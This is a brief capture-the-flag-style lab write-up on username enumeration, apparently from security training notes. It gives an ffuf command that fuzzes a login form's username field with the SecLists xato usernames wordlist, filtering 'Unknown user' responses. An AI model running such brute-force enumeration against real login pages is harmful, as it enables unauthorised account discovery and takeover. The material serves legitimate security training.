Brute-Force Attacks

Enumerate a valid user on the web application. Provide the username as the answer.

To complete this assessment we need the SecLists usernames wordlist and a simple ffuf command to brute-force the an application username.

Step 1 - Download the SecLists wordlist:

xato-net-10-million-usernames.txt

Step 2 - Enumerate with ffuf:

ffuf -w xato-net-10-million-usernames.txt -u http://SERVER_IP:SERVER_PORT/index.php -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "username=FUZZ&password=random" -fr "Unknown user"

After a few seconds we got the username!

PreviousBroken Authentication NextBrute-Forcing Passwords

Last updated 5 months ago